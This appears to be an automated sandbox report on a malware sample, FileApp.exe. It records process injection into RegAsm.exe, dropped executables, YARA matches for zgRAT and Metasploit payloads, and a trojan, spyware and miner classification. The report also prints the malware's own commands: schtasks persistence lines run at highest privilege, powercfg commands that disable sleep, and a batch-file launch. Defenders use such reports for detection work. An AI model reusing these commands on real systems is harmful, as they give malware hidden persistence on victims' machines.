Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69D062C0	22_2_69D062C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C522A0	22_2_69C522A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C4E2B0	22_2_69C4E2B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C18250	22_2_69C18250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C08260	22_2_69C08260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C4A210	22_2_69C4A210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C58220	22_2_69C58220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69B745B0	22_2_69B745B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C4A5E0	22_2_69C4A5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C0E5F0	22_2_69C0E5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C84540	22_2_69C84540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69CC8550	22_2_69CC8550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C20570	22_2_69C20570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69BE2560	22_2_69BE2560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69BD8540	22_2_69BD8540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C1A4D0	22_2_69C1A4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69CAA480	22_2_69CAA480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69BC64D0	22_2_69BC64D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69BE4420	22_2_69BE4420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69B98460	22_2_69B98460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C0A430	22_2_69C0A430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69BAA7D0	22_2_69BAA7D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C00700	22_2_69C00700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C1E6E0	22_2_69C1E6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69BDE6E0	22_2_69BDE6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69BA46D0	22_2_69BA46D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69BDC650	22_2_69BDC650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C199C0	22_2_69C199C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C179F0	22_2_69C179F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69B91980	22_2_69B91980
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69BE59F0	22_2_69BE59F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C51990	22_2_69C51990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69BB99D0	22_2_69BB99D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C3D960	22_2_69C3D960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69CCF900	22_2_69CCF900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69BFF960	22_2_69BFF960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C35920	22_2_69C35920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C1F8C0	22_2_69C1F8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C5F8F0	22_2_69C5F8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69CDB8F0	22_2_69CDB8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69B8D8E0	22_2_69B8D8E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69BB38E0	22_2_69BB38E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69BDD810	22_2_69BDD810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69BD9BA0	22_2_69BD9BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69B71B80	22_2_69B71B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69BC7BF0	22_2_69BC7BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C65B90	22_2_69C65B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C49BB0	22_2_69C49BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69BCBB20	22_2_69BCBB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C5FB60	22_2_69C5FB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69B81AE0	22_2_69B81AE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C5DAB0	22_2_69C5DAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69D09A50	22_2_69D09A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69BBFA10	22_2_69BBFA10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C21A10	22_2_69C21A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C7DA30	22_2_69C7DA30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C51DC0	22_2_69C51DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69B73D80	22_2_69B73D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69CC9D90	22_2_69CC9D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69BE3D00	22_2_69BE3D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69CBDCD0	22_2_69CBDCD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C41CE0	22_2_69C41CE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C1FC80	22_2_69C1FC80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69B91C30	22_2_69B91C30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69CA9C40	22_2_69CA9C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69B83C40	22_2_69B83C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C9DFC0	22_2_69C9DFC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69D03FC0	22_2_69D03FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69BA1F90	22_2_69BA1F90

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process token adjusted: Security

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0053E310 appears 39 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 69BA3620 appears 89 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00404610 appears 317 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 69D009D0 appears 292 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 69D0D930 appears 54 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 69D0DAE0 appears 65 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 69BA9B10 appears 92 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 69BDC5E0 appears 35 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 69CB9F30 appears 50 times

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 5644 -ip 5644

Source: FileApp.exe, 00000000.00000000.2114249018.0000000000F8B000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameadsbrowser.exe$ vs FileApp.exe
Source: FileApp.exe, 00000000.00000002.2119885644.00000000015FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs FileApp.exe
Source: FileApp.exe, 00000000.00000002.2130547013.0000000005D20000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameVXxHvcJSL.dll0 vs FileApp.exe
Source: FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePE.dll& vs FileApp.exe
Source: FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePDFReader.exe4 vs FileApp.exe
Source: FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameVXxHvcJSL.dll0 vs FileApp.exe
Source: FileApp.exe, 00000000.00000002.2120455815.0000000004FD3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePDFReader.exe4 vs FileApp.exe
Source: FileApp.exe, 00000000.00000002.2120455815.00000000051AD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePDFReader.exe4 vs FileApp.exe
Source: FileApp.exe, 00000000.00000002.2120455815.0000000004C21000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameVXxHvcJSL.dll0 vs FileApp.exe
Source: FileApp.exe, 00000000.00000002.2130007558.00000000058C0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamePE.dll& vs FileApp.exe

Source: FileApp.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 5.2.ZYgCMtJP3wxddinn5Sa3IKJH.exe.40e5570.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 5.2.ZYgCMtJP3wxddinn5Sa3IKJH.exe.40e5570.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0000000B.00000002.2733299099.0000000001980000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 0000000C.00000002.2767261547.000000000264A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 0000000B.00000002.2733299099.0000000001AD4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research

Source: classification engine

Classification label: mal100.troj.spyw.evad.mine.winEXE@106/105@12/18

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 22_2_69BE0300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,

22_2_69BE0300

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 22_2_004190A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

22_2_004190A0

Source: C:\Users\user\Desktop\FileApp.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FileApp.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4052:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3512:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6196:120:WilError_03
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\UipomonaWW_2
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3108:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4344:120:WilError_03
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Mutant created: \Sessions\1\BaseNamedObjects\IntelPowerEExpert
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4180:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6776:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6836:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1036:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6784:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2544:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3576:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5644

Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe

File created: C:\Users\user\AppData\Local\Temp\nsvEF5F.tmp

Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Command Command.bat & Command.bat & exit

Source: FileApp.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: FileApp.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.69%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process

Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\FileApp.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegAsm.exe

Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);

Source: FileApp.exe

ReversingLabs: Detection: 23%

Source: kPy9KuGWnhtidoY4IdmVbiaT.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: unknown	Process created: C:\Users\user\Desktop\FileApp.exe "C:\Users\user\Desktop\FileApp.exe"
Source: C:\Users\user\Desktop\FileApp.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 5644 -ip 5644
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5644 -s 824
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Command Command.bat & Command.bat & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Process created: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe "C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe"
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\jewkkwnf\jewkkwnf.exe C:\ProgramData\jewkkwnf\jewkkwnf.exe
Source: unknown	Process created: C:\ProgramData\jewkkwnf\jewkkwnf.exe C:\ProgramData\jewkkwnf\jewkkwnf.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe "C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userFBKKJEBFID.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userEHJKFCGHID.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Process created: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe "C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe"
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Process created: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe "C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe"
Source: C:\Users\user\Desktop\FileApp.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe	Jump to behavior
